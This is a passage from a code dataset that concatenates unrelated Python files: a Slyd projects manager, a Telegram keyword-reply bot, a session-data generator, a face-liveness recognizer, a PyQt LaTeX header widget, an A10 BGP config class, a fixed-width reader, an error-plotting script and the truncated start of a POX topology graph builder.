(1) implements: all_projects(), copy_data(), download_project()\n# (2) provides: project_filename()\nclass FileSystemProjectsManager(ProjectsManager):\n    storage_class = FsStorage # <== slyd.utils.storage: class FsStorage(CommitingStorage, FileSystemStorage)\n    basedir = '.'\n\n    def __init__(self, auth_info):\n        super(FileSystemProjectsManager, self).__init__(auth_info)\n        self.storage = self.storage_class(self.base_dir)\n        self.projectsdir = self.base_dir # directory that holds the projects\n\n    # operation: list the id and name of every project\n    def all_projects(self):\n        try:\n            # enumerate the directory through the storage attribute's listdir() method\n            for fname in self.storage.listdir(self.projectsdir):\n                if os.path.isdir(join(self.projectsdir, fname)):\n                    yield {'id': fname, 'name': fname} # yields: {'id':..., 'name':...}\n        except OSError as ex:\n            if ex.errno != errno.ENOENT:\n                raise\n\n    # full path of the directory for the project with the given name\n    def project_filename(self, name):\n        return join(self.projectsdir, name)\n\n    # \n    def copy_data(self, source, destination, spiders, items):\n        copier = FileSystemSpiderCopier(source, destination, self.projectsdir)\n        return json.dumps(copier.copy(spiders, items))\n\n    def download_project(self, name, spiders=None, version=None, fmt=None,\n                         **kwargs):\n        storage = self.storage_class(self.project_filename(name))\n        if fmt == u'code':\n            archiver = CodeProjectArchiver(storage, name=name)\n        else:\n            archiver = ProjectArchiver(storage, name=name)\n        return archiver.archive(spiders).read()\n","sub_path":"slyd/slyd/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":11164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"234930289","text":"# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/27 18:04\nimport telebot\nfrom telebot import types\nimport random\nimport yaml\nimport re\nimport json\nimport logging\nimport time\nfrom modules import regexp_search\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\n# read the bot token from the config file\nwith open(\"config/config.yaml\", 'r+', encoding='UTF-8') as token_file:\n    bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN']\n\n# instantiate the bot\nbot = telebot.TeleBot(TOKEN)\n\n# load the owner's user id\nMYID = bot_token['USERID']\n\n# command reply handlers\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n    new_message = bot.send_message(message.chat.id, \"咱是个可爱的回话机器人\")\n    time.sleep(120)\n    bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\n@bot.message_handler(commands=['help'])\ndef send_help(message):\n    new_message = bot.send_message(message.chat.id,\n                                   \"\"\"\nAuthor: \n\n@SaiToAsuKa_kksk\n\nSponsor:\n\n暂时还没有赞助,假如你对我的 bot 感兴趣非常欢迎私聊我\n\nGuide:\n\n大部分功能为管理员专属,目前普通用户可用 /post 
功能投稿自己感兴趣的内容\n\nAffiliate:\n\n我真的真的续不起服务器了QWQ,快点击 AFF 帮助我吧\n\n【VULTR1】 【VULTR2】\n\nGroup:\n\nNSFW 中文水群: @ghs_chat\nNSFW 本子推荐频道: @hcomic\nBOT 更新频道: @avimitinbot\nBOT 测试群组: @avimitin_test\n \"\"\", parse_mode=\"HTML\",disable_web_page_preview=True)\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id,\n message_id=new_message.message_id)\n\n\n# 关键词添加程序\n@bot.message_handler(commands=['add'])\ndef add_keyword(message):\n if message.from_user.username != 'example':\n new_message = bot.send_message(message.chat.id, '别乱碰我!')\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 4:\n bot.send_message(message.chat.id, '/add 命令用法: `/add keyword=value` 。请不要包含空格。', parse_mode='Markdown')\n elif re.search(r' ', message.text[5:]):\n bot.send_message(message.chat.id, '请不要包含空格!')\n else:\n text = message.text[5:]\n split_sen = re.split(r'=', text)\n split_sen_dic = {split_sen[0]: split_sen[1]}\n bot.send_message(message.chat.id, '我已经学会了,当你说{}的时候,我会回复{}'.format(split_sen[0], split_sen[1]))\n with open('config/Reply.yml', 'a+', encoding='UTF-8') as reply_file:\n reply_file.write('\\n')\n yaml.dump(split_sen_dic, reply_file, allow_unicode=True)\n\n\n# 关键词删除程序\n@bot.message_handler(commands=['delete'])\ndef del_keyword(message):\n if message.from_user.username != 'SaiToAsuKa_kksk':\n new_message = bot.send_message(message.chat.id, '你不是我老公,爬')\n time.sleep(10)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 7:\n bot.send_message(message.chat.id, \"/delete usage: `/delete keyword`.\", parse_mode='Markdown')\n else:\n text = message.text[8:]\n with open('config/Reply.yml', 'r+', encoding='UTF-8') as reply_file:\n reply_msg_dic = yaml.load(reply_file, Loader=yaml.FullLoader)\n if reply_msg_dic.get(text):\n del reply_msg_dic[text]\n bot.send_message(message.chat.id, '已经删除{}'.format(text))\n with open('config/Reply.yml', 'w+', encoding='UTF-8') as new_file:\n yaml.dump(reply_msg_dic, new_file, allow_unicode=True)\n else:\n msg = bot.send_message(message.chat.id, '没有找到该关键词')\n time.sleep(5)\n bot.delete_message(msg.chat.id, msg.message_id)\n\n\n# 信息json处理\n@bot.message_handler(commands=['dump'])\ndef dump_msg(message):\n text = json.dumps(message.json, sort_keys=True, indent=4, ensure_ascii=False)\n new_msg = bot.send_message(message.chat.id, text)\n time.sleep(60)\n bot.delete_message(new_msg.chat.id, new_msg.message_id)\n\n\n@bot.message_handler(commands=['post'])\ndef post_message(message):\n if message.chat.type == 'supergroup':\n if message.from_user.id == 'YOUR_TG_ID':\n if message.reply_to_message:\n msg = bot.send_message(message.chat.id, '正在发送投稿')\n bot.forward_message('YOUR_CHANNEL_ID', message.chat.id, message.reply_to_message.message_id)\n bot.edit_message_text('投稿成功', msg.chat.id, msg.message_id)\n time.sleep(30)\n bot.delete_message(msg.chat.id, msg.message_id)\n else:\n bot.send_message(message.chat.id, '请回复一个消息来投稿')\n else:\n bot.send_message(message.chat.id, '只有管理员可以用!再乱动我扁你')\n else:\n bot.send_message(message.chat.id, '请在群组里使用')\n\n\n# +--------------------------------------------------------------------------------------------+\n# 查询关键词是否在字典,查询字典key对应值是否为列表,是则返回随机语句,否则直接返回key对应语句\n# 语法糖中的lambda从导入的regexp模块中查询关键词存在与否,存在返回True,不存在返回False\n# +--------------------------------------------------------------------------------------------+\nre_mg = regexp_search.Msg()\n\n\n@bot.message_handler(func=lambda message: 
re_mg.msg_match(message.text))\ndef reply_msg(message):\n msg_dic = re_mg.reply_msg_dic\n keyword = re_mg.keyword\n # 通过上面的keyword键从字典中读取值 \n reply_words = msg_dic[keyword] \n if type(reply_words) == list:\n num = random.randrange(len(reply_words))\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words[num])\n else:\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words)\n\n\n# 使用机器人主动私聊别的房间\n@bot.message_handler(commands=['send'])\ndef get_a_message(message):\n if message.from_user.id == MYID:\n markup = types.InlineKeyboardMarkup()\n # 首先需要在 config 文件夹里创建一个 chat_info.json 文件\n with open(\"config/chat_info.json\", 'r', encoding='utf-8') as chat_file:\n # 空文件测试\n test = chat_file.read()\n if len(test) != 0:\n chat_file.seek(0, 0)\n chat_info = json.load(chat_file)\n else:\n bot.send_message(MYID, \"chat_info is empty! Use /addchatinfo to add chat\")\n return\n\n keys = list(chat_info.keys())\n\n for key in keys:\n item = types.InlineKeyboardButton(key, callback_data=\"chat_id=%d\" % chat_info[key])\n markup.add(item)\n\n bot.send_message(MYID, \"选择一个已存聊天室,或使用 /addchatid 添加新聊天室\", reply_markup=markup)\n\n else:\n bot.send_message(message.chat.id, \"只有管理员可以使用这一功能\")\n bot.send_message(MYID, \"@%s 正在使用 send 功能\" % message.from_user.username)\n\n# 初始化变量CHATID\nCHATID = 0\n\n@bot.callback_query_handler(func=lambda call: re.match('chat_id=', call.data))\ndef attach_to_chat(call):\n global CHATID\n \n chat_id = call.data.split(\"chat_id=\")[1]\n CHATID = chat_id\n msg = bot.send_message(MYID, '已经连接到 `%s` 房间,请发送一条消息' % chat_id, parse_mode='Markdown')\n bot.register_next_step_handler(msg, send_msg_to_chat)\n\n\ndef send_msg_to_chat(message):\n msg = message.text\n bot.send_message(CHATID, msg)\n bot.send_message(MY_ID, '发送成功')\n\n\n# 添加新的聊天室(需要bot在群里面,或是已经启用过的私聊)\n@bot.message_handler(commands=[\"addchatid\"])\ndef add_chat(message):\n if message.chat.id != MYID:\n bot.send_message(message.chat.id, \"不要乱动指令\")\n return\n \n # 测试命令后是否带着chat id\n if len(message.text) == 10:\n bot.send_message(message.chat.id, \"请在指令后带上聊天室的 ChatID\")\n \n else:\n # 先测试是否能发送消息再存\n chat_id = message.text.split(\"/addchatid \")[1]\n msg = bot.send_message(message.chat.id, \"尝试发送消息\")\n\n try:\n chat_info = bot.send_message(chat_id, \"Testing message\")\n except telebot.apihelper.ApiException:\n bot.send_message(message.chat.id, \"无法发送信息,检查一下是否是存在的群\")\n else:\n msg = bot.edit_message_text(\"尝试成功,正在写入\", msg.chat.id, msg.message_id)\n\n with open(\"config/chat_info.json\", \"r+\", encoding=\"utf-8\") as chat_info_file:\n test_null = chat_info_file.read()\n \n # 信息初始化\n items = {\n \"title\": chat_info.chat.title,\n \"username\": chat_info.chat.username,\n \"first_name\": chat_info.chat.username,\n \"last_name\": chat_info.chat.last_name\n }\n for item in items.values():\n if item != None:\n name = item\n\n # 检查是否为空文件\n if len(test_null) != 0:\n chat_info_file.seek(0, 0)\n chat_dict = json.load(chat_info_file)\n chat_dict[name] = chat_id\n else:\n chat_dict = {name: chat_id}\n\n with open(\"config/chat_info.json\", \"r+\", encoding=\"utf-8\") as chat_info_file:\n json.dump(chat_dict, chat_info_file, ensure_ascii=False)\n bot.edit_message_text(\"存储成功\", msg.chat.id, msg.message_id)\n\n\nif __name__ == '__main__':\n # 轮询\n 
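The keyword handler above looks the matched key up in the reply dict and, when the value is a list, answers with a random element via `random.randrange`; note also that `send_msg_to_chat` above references `MY_ID` while the constant is defined as `MYID`, which would raise a `NameError` at runtime. The dispatch logic in isolation, using the idiomatic `random.choice` equivalent:

```python
import random

replies = {'hello': ['hi', 'hey there'], 'bye': 'see you'}  # sample table

def pick_reply(keyword):
    """List values yield one element at random; plain strings pass through."""
    value = replies[keyword]
    if isinstance(value, list):
        return random.choice(value)
    return value

print(pick_reply('bye'))                        # see you
print(pick_reply('hello') in replies['hello'])  # True
```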
bot.polling(none_stop=True)\n","sub_path":"Bot1.py","file_name":"Bot1.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263089466","text":"from app.common.database import Db\nfrom app.common.util import Util\nfrom app.models.sessions import SessionModel\nimport time\nfrom datetime import datetime\nimport random\n\nuser_id = \"jainik_vora@live.in\"\nactivities = [1, 2]\nsession_name = ['Lose Weight', 'Burn Fat!', 'Get Fit']\nstart_time = ['07:00:00', '06:30:00', '19:00:00', '17:39:00']\nend_time = ['07:35:00', '07:15:00', '19:40:00', '18:00:00']\nstatus = 'USER_CREATED'\n\ndate_range = Util.daterange(Util.convert_string_to_datetime(\"2016-08-10\"), Util.convert_string_to_datetime(\"2016-08-30\"))\n\n\nquery_single_insert = \"\"\"INSERT INTO t_user_session (\n user_id,\n name,\n workout_type_id,\n start_datetime,\n end_datetime,\n session_status,\n created_datetime,\n modified_datetime,\n\t\t session_type\n ) VALUES (\n '%(user_id)s',\n '%(name)s',\n %(workout_type_id)s,\n '%(start_datetime)s',\n '%(end_datetime)s',\n '%(session_status)s',\n '%(created_datetime)s',\n '%(modified_datetime)s',\n\t\t 'PERSONAL'\n )\"\"\"\n\nuser_sessions = []\nfor date in date_range:\n this_session_name = session_name[random.randint(0, 2)]\n random_num = random.randint(0, 3)\n session_start_date = date.strftime(\"%Y-%m-%d\") + \" \" + start_time[random_num]\n session_end_date = date.strftime(\"%Y-%m-%d\") + \" \" + end_time[random_num]\n workout_type = activities[random.getrandbits(1)]\n\n data = {\n 'user_id': user_id,\n 'name': this_session_name,\n 'workout_type_id': workout_type,\n 'start_datetime': session_start_date,\n 'end_datetime': session_end_date,\n 'session_status': status,\n 'created_datetime': Util.get_current_time(),\n 'modified_datetime': Util.get_current_time()\n }\n Db.execute_insert_query(query_single_insert % data)\n","sub_path":"app/scripts/generate_session_data.py","file_name":"generate_session_data.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191269790","text":"import face_recognition\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nimport numpy as np\nimport pickle\nimport cv2\nimport os\nimport Svm_face_recognition\n\nclass FaceRecognition():\n def __init__(self):\n self.process_this_frame = True\n self.label = \"fake\"\n # 加载人脸检测模型和活体模型\n self.protoPath = os.path.sep.join([\"face_detector\", \"deploy.prototxt\"]) # 路径组合\n self.modelPath = os.path.sep.join([\"face_detector\",\"res10_300x300_ssd_iter_140000.caffemodel\"])\n self.net = cv2.dnn.readNetFromCaffe(self.protoPath, self.modelPath) # 用于进行SSD网络的caffe框架的加载,(进行目标检测的网络)\n self.model = load_model(\"./model/liveness.model\") # liveness.model : keras 训练好的模型\n self.le = pickle.loads(open(\"./model/le.pickle\", \"rb\").read()) # le.pickle : 类别标签编码器\n\n\n def kernel(self, frame, known_face,num_list):\n self.label = \"fake\"\n # 改变摄像头图像的大小,图像小,所做的计算就少\n # grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,(300, 300), (104.0, 177.0, 123.0)) # 对图像进行归一化操作(-1, 1)\n # pass the blob through the network and obtain the detections and\n # predictions\n self.net.setInput(blob) # 表示将图片输入到caffe网络中\n detections = self.net.forward() # 输出前向传播的预测结果\n\n # 对探测结果进行循环\n for i in range(0, detections.shape[2]):\n # extract the 
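The session generator above (`generate_session_data.py`) splices values into its INSERT statement with `%` formatting, which breaks on embedded quotes and invites SQL injection. A safer equivalent under the same DB-API style, sketched with sqlite3 so it runs standalone:

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE t_user_session '
             '(user_id TEXT, name TEXT, start_datetime TEXT, end_datetime TEXT)')

row = ('jainik_vora@live.in', 'Lose Weight',
       '2016-08-10 07:00:00', '2016-08-10 07:35:00')
# Bound parameters let the driver handle quoting instead of string formatting.
conn.execute('INSERT INTO t_user_session '
             '(user_id, name, start_datetime, end_datetime) VALUES (?, ?, ?, ?)', row)
conn.commit()
print(conn.execute('SELECT COUNT(*) FROM t_user_session').fetchone()[0])  # 1
```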
confidence (i.e., probability) associated with the\n # prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections 过滤掉微弱的检测信号\n if confidence > 0.8:\n # compute the (x, y)-coordinates of the bounding box for\n # the face and extract the face ROI\n # 计算出人脸的坐标范围\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = face_box = box.astype(\"int\")\n startX = max(0, startX)\n startY = max(0, startY)\n endX = min(w, endX)\n endY = min(h, endY)\n if startX > 1200 or startY > 1200 or endX > 1200 or endY > 1200:\n break\n face = frame[startY:endY, startX:endX]\n face = cv2.resize(face, (32, 32))\n face = face.astype(\"float\") / 255.0\n face = img_to_array(face) # 将人脸矩阵中的整数,换成浮点数\n face = np.expand_dims(face, axis=0) # 在 0 轴上,添加一个维度\n preds = self.model.predict(face)[0]\n j = np.argmax(preds) # 取出 preds 中最大的数的索引\n if preds[j] > 0.2:\n self.label = self.le.classes_[j]\n\n\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # opencv的图像是BGR格式的,而我们需要的是RGB格式,因 此要进行一个转换\n rgb_small_frame = small_frame[:, :, ::-1]\n\n if self.process_this_frame:\n # 根据encoding来判断是不是同一个人,是就输出true,不是为false\n if str(self.label) == \"real\":\n num = Svm_face_recognition.recognition(rgb_small_frame)\n return num\n\n\n\n\nif __name__ == \"__main__\":\n pass\n\n\n\n","sub_path":"人脸识别/登记系统的制作/Face_Recognition.py","file_name":"Face_Recognition.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443225946","text":"\n\n##################################################################################\n## Imports\n\n# GUI\nfrom PyQt5.QtWidgets import QHeaderView, QStyleOptionHeader, QStyle\nfrom PyQt5.QtCore import Qt, QRect\nfrom PyQt5.QtGui import QCursor\n\n\n####################################################################################\n## Class to enable latex headers\nclass wTexHeader(QHeaderView):\n def __init__(self, parent, ori=Qt.Horizontal):\n super().__init__(ori, parent)\n\n self.setSectionsClickable(True)\n #self.setStretchLastSection(True)\n\n # creating list of qpixmaps\n self.qpixmaps = []\n return\n\n def paintSection(self, painter, rect, logicalIndex):\n # skipping uneccesarry\n if not rect.isValid():\n return\n\n # checking if there are no pixmaps\n # using default painter\n if not self.qpixmaps:\n super().paintSection(painter, rect, logicalIndex)\n return\n #------------------------------ paint section (without the label) ----\n opt = QStyleOptionHeader()\n self.initStyleOption(opt)\n\n opt.rect = rect\n opt.section = logicalIndex\n opt.text = \"\"\n\n #---- mouse over highlight ----\n mouse_pos = self.mapFromGlobal(QCursor.pos())\n if rect.contains(mouse_pos):\n opt.state |= QStyle.State_MouseOver\n\n #---- paint ----\n painter.save()\n self.style().drawControl(QStyle.CE_Header, opt, painter, self)\n painter.restore()\n\n #------------------------------------------- paint mathText label ----\n # aliasing qpixmap\n qpixmap = self.qpixmaps[logicalIndex]\n\n #---- centering ----\n xpix = (rect.width() - qpixmap.size().width()) / 2. 
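The liveness path above clamps the SSD box to the frame, crops the face, resizes it to 32×32, and scales pixels to [0, 1] before the Keras model sees it. That preprocessing as a standalone helper, assuming a BGR `numpy` frame as OpenCV provides:

```python
import cv2
import numpy as np

def preprocess_face(frame, box):
    """Crop `box` = (startX, startY, endX, endY) and prepare a 32x32 input."""
    h, w = frame.shape[:2]
    start_x, start_y, end_x, end_y = box
    start_x, start_y = max(0, start_x), max(0, start_y)  # clamp to the frame
    end_x, end_y = min(w, end_x), min(h, end_y)
    face = frame[start_y:end_y, start_x:end_x]
    face = cv2.resize(face, (32, 32)).astype('float32') / 255.0
    return np.expand_dims(face, axis=0)  # batch dimension for model.predict

frame = np.zeros((480, 640, 3), dtype=np.uint8)
print(preprocess_face(frame, (-10, 20, 200, 300)).shape)  # (1, 32, 32, 3)
```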
+ rect.x()\n ypix = (rect.height() - qpixmap.size().height()) / 2.\n\n\n #---- paint ----\n rect = QRect(xpix, ypix, qpixmap.size().width(), qpixmap.size().height())\n painter.drawPixmap(rect, qpixmap)\n\n return\n\n def sizeHint(self):\n\n baseSize = QHeaderView.sizeHint(self)\n\n baseHeight = baseSize.height()\n if len(self.qpixmaps):\n for pixmap in self.qpixmaps:\n baseHeight = max(pixmap.height() + 8, baseHeight)\n baseSize.setHeight(baseHeight)\n\n self.parentWidget().repaint()\n\n return baseSize\n","sub_path":"wynTable/wynTexHeader.py","file_name":"wynTexHeader.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641419482","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass IpCidr(A10BaseClass):\n \n \"\"\"Class Description::\n Specify a ip network to announce via BGP.\n\n Class ip-cidr supports CRUD Operations and inherits from `common/A10BaseClass`.\n This class is the `\"PARENT\"` class for this module.`\n\n :param description: {\"description\": \"Network specific description (Up to 80 characters describing this network)\", \"format\": \"string-rlx\", \"minLength\": 1, \"optional\": true, \"maxLength\": 80, \"type\": \"string\"}\n :param route_map: {\"description\": \"Route-map to modify the attributes (Name of the route map)\", \"format\": \"string\", \"minLength\": 1, \"optional\": true, \"maxLength\": 128, \"type\": \"string\"}\n :param comm_value: {\"optional\": true, \"type\": \"string\", \"description\": \"community value in the format 1-4294967295|AA:NN|internet|local-AS|no-advertise|no-export\", \"format\": \"string-rlx\"}\n :param backdoor: {\"default\": 0, \"optional\": true, \"type\": \"number\", \"description\": \"Specify a BGP backdoor route\", \"format\": \"flag\"}\n :param network_ipv4_cidr: {\"optional\": false, \"type\": \"string\", \"description\": \"Specify network mask\", \"format\": \"ipv4-cidr\"}\n :param uuid: {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. 
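The pixmap placement above centres each image inside its header section; note that `xpix` adds `rect.x()` while `ypix` omits `rect.y()`, which only comes out right because a horizontal header's sections sit at y = 0. The arithmetic with both offsets, as a plain function:

```python
def centered_origin(section, pixmap):
    """Top-left point that centres a (w, h) pixmap in an (x, y, w, h) section."""
    x, y, w, h = section
    pw, ph = pixmap
    return (x + (w - pw) / 2.0, y + (h - ph) / 2.0)

assert centered_origin((10, 0, 100, 30), (40, 20)) == (40.0, 5.0)
```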
Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https:////axapi/v3/router/bgp/{as_number}/network/ip-cidr/{network_ipv4_cidr}`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required = [ \"network_ipv4_cidr\"]\n\n self.b_key = \"ip-cidr\"\n self.a10_url=\"/axapi/v3/router/bgp/{as_number}/network/ip-cidr/{network_ipv4_cidr}\"\n self.DeviceProxy = \"\"\n self.description = \"\"\n self.route_map = \"\"\n self.comm_value = \"\"\n self.backdoor = \"\"\n self.network_ipv4_cidr = \"\"\n self.uuid = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","sub_path":"a10sdk/core/router/router_bgp_network_ip_cidr.py","file_name":"router_bgp_network_ip_cidr.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"497238205","text":"import numpy as np\n\ndef rdfixwid(file,colist,typelist,empstr=None,skiprows=0):\n \"\"\"\n Read fixedwidth data and spit out arrays\n \"\"\"\n outlist =[]\n f = open(file,'r')\n txt = f.readlines()\n txt = txt[skiprows:]\n nrows = len(txt)\n ncol = len(colist)\n\n for type in typelist:\n outlist.append(np.zeros(nrows,dtype=type))\n \n \n for i in range(nrows):\n for j in range(ncol):\n word = txt[i][colist[j][0]:colist[j][1]]\n if empstr is not None:\n word = emp2none(word,empstr)\n outlist[j][i] = word\n\n return tuple(outlist)\n\n\n\ndef emp2none(inpstr,empstr):\n \"\"\"\n If inpstr corresponds to an empty string. Return a none. \n \"\"\"\n if inpstr.strip() is empstr:\n inpstr = None\n\n return inpstr\n","sub_path":"rdfixwid.py","file_name":"rdfixwid.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314599339","text":"import glob\nimport os\nimport argparse as argp\nimport numpy as np\nimport meshio\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport scipy.stats\n\nNUM_ELE = [80, 180, 320, 500, 720]\nFOLDER_NAMES = [\"cp-le\", \"cp-qe\", \"lp-le\", \"lp-qe\"]\n\ndef main():\n parser = argp.ArgumentParser(description=\"Creates 2x2 plot of average local error data for the 4 parameterizations\")\n parser.add_argument(\"in_dir\", help=\"Starting folder of vtk files. 
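`rdfixwid` above slices each line at fixed column spans and maps empty strings to `None`; its `inpstr.strip() is empstr` test compares identity rather than equality, so it should use `==` (string interning makes `is` work only by accident). A compact sketch of the column-slicing idea, treating all-whitespace fields as missing:

```python
def parse_fixed_width(lines, col_spans):
    """Slice each line at (start, end) spans; blank fields become None."""
    return [[line[a:b].strip() or None for a, b in col_spans] for line in lines]

rows = parse_fixed_width(['12.34   foo', '  .99      '], [(0, 5), (5, 12)])
print(rows)  # [['12.34', 'foo'], ['.99', None]]
```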
Expecting specific folder structure in subfolders\")\n parser.add_argument(\n \"-o\",\n \"--outname\",\n help=\"output file name\",\n default=\"avg_rel_errs\"\n )\n parser.add_argument(\n \"-t\",\n \"--tag\",\n help=\"Ellipsoid dimensions tag to put on figure\",\n required=True\n )\n args = parser.parse_args()\n\n fig, axs = plt.subplots(2, 2, sharey=True, figsize=(6, 6))\n axs = np.ravel(axs)\n axs[0].set_ylim([0.001, 0.40])\n\n for i, fn in enumerate(FOLDER_NAMES):\n subfolder = os.path.join(os.path.join(args.in_dir, fn), \"\")\n E12_errs = []\n E23_errs = []\n E31_errs = []\n Ep_errs = []\n Em_errs = []\n H3x3_0_errs = []\n H3x3_1_errs = []\n H3x3_2_errs = []\n for vtk_file in sorted(glob.glob(subfolder + \"*.vtk\")):\n io_mesh = meshio.read(vtk_file)\n if io_mesh.cell_data:\n data = io_mesh.cell_data\n elif io_mesh.point_data:\n data = io_mesh.point_data\n E12_errs.append(np.mean(data[\"local_err_E12\"]))\n E23_errs.append(np.mean(data[\"local_err_E23\"]))\n E31_errs.append(np.mean(data[\"local_err_E31\"]))\n Ep_errs.append(np.mean(data[\"local_err_Ep\"]))\n Em_errs.append(np.mean(data[\"local_err_Em\"]))\n H3x3_0_errs.append(np.mean(data[\"local_err_3x3_0\"]))\n H3x3_1_errs.append(np.mean(data[\"local_err_3x3_1\"]))\n H3x3_2_errs.append(np.mean(data[\"local_err_3x3_2\"]))\n\n axs[i].plot(NUM_ELE, E12_errs, label=r\"$E^{(12)}$\", marker=\"o\", markersize=3)\n axs[i].plot(NUM_ELE, E23_errs, label=r\"$E^{(23)}$\", marker=\"^\", markersize=3)\n axs[i].plot(NUM_ELE, E31_errs, label=r\"$E^{(31)}$\", marker=\"s\", markersize=3)\n axs[i].plot(NUM_ELE, Ep_errs, label=r\"$E^{(+)}$\", marker=\"p\", markersize=3)\n axs[i].plot(NUM_ELE, Em_errs, label=r\"$E^{(-)}$\", marker=\"H\", markersize=3)\n\n axs[i].plot(NUM_ELE, H3x3_0_errs, label=r\"$Q^{(1)}$\", marker=\"*\", markersize=3)\n axs[i].plot(NUM_ELE, H3x3_1_errs, label=r\"$Q^{(2)}$\", marker=\"d\", markersize=3)\n axs[i].plot(NUM_ELE, H3x3_2_errs, label=r\"$Q^{(3)}$\", marker=\"x\", markersize=3)\n\n axs[i].set_xscale(\"log\")\n axs[i].set_xlim([60, 1000])\n axs[i].set_yscale(\"log\")\n\n if i in [2, 3]:\n axs[i].set_xlabel(\"Number of elements\")\n if i in [0, 2]:\n axs[i].set_ylabel(\"Average local error\")\n\n add_textbox(axs[i], fn)\n\n # Set common labels\n props = dict(boxstyle='round', facecolor='skyblue', alpha=0.5)\n ellipsoid_tag = args.tag + \"\\n ellipsoid\"\n handles, labels = axs[0].get_legend_handles_labels()\n fig.legend(handles, labels, loc=\"center\", bbox_to_anchor=(0.92, 0.5))\n fig.text(0.92, 0.75, ellipsoid_tag,\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n bbox=props\n )\n\n fig.tight_layout(rect=[0, 0, 0.85, 1])\n fig.savefig(\"{}.pdf\".format(args.outname), format=\"pdf\")\n\n\ndef add_textbox(ax, textstr):\n \"\"\"\n Adds an informative textbox to to figure\n\n Parameters:\n ax: the axes object\n textstr: the string in the textbox\n Returns:\n None\n \"\"\"\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n ax.text(0.80, 0.90, textstr,\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n transform=ax.transAxes,\n fontsize=10,\n bbox=props\n )\n\n\ndef c2l(x):\n if isinstance(x, list):\n return x[0]\n return x\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"graph_making/old/make_2x2_avg_err.py","file_name":"make_2x2_avg_err.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628198651","text":"from collections import defaultdict\nfrom pox.core import core\nfrom 
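The script above produces a 2×2 grid of log-log convergence curves, one panel per parameterization, each point being the mean local error over a mesh. A minimal sketch of that figure layout with synthetic data in place of the meshio reads:

```python
import numpy as np
import matplotlib.pyplot as plt

num_ele = [80, 180, 320, 500, 720]
fig, axs = plt.subplots(2, 2, sharey=True, figsize=(6, 6))
for ax, name in zip(np.ravel(axs), ['cp-le', 'cp-qe', 'lp-le', 'lp-qe']):
    errs = 1.0 / np.asarray(num_ele, dtype=float)  # stand-in for file averages
    ax.plot(num_ele, errs, marker='o', markersize=3, label=name)
    ax.set_xscale('log')
    ax.set_yscale('log')
fig.tight_layout()
fig.savefig('avg_rel_errs_sketch.pdf', format='pdf')
```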
pox.lib.revent import EventHalt,Event,EventMixin\nfrom sre_constants import MIN_UNTIL\n\n# Graph class, contains the discovered network topology in nodes, edges format. Between the links there is an opportunity\n# to compute with different distance values, therefore we have a dictionary to store these values (distances dict). We also store\n# the ports which belong to exact links, in order to be able to insert the correct output ports on the selected route to the routers' flow table.\n\nlog = core.getLogger()\n\nclass GraphStructureChanged(Event):\n def __str__ (self):\n return \"Graph Structure changed\"\n \n def __init__ (self,graph_builder):\n super(GraphStructureChanged,self).__init__()\n self.graph_builder = graph_builder\n \n def get_graph_builder(self):\n return self.graph_builder\n \n \nclass GraphBuilder(EventMixin):\n _eventMixin_events = set([GraphStructureChanged])\n _rule_priority_adjustment = -0x1000 \n\n def __init__(self):\n core.addListeners(self)\n core.openflow_discovery.addListeners(self)\n self.nodes = []\n self.edges = defaultdict(list)\n self.distances = {}\n self.ports = {}\n \n def add_node(self, value):\n if value not in self.nodes:\n self.nodes.append(value)\n \n def del_node(self, value):\n if value not in self.edges.values() and value in self.nodes:\n 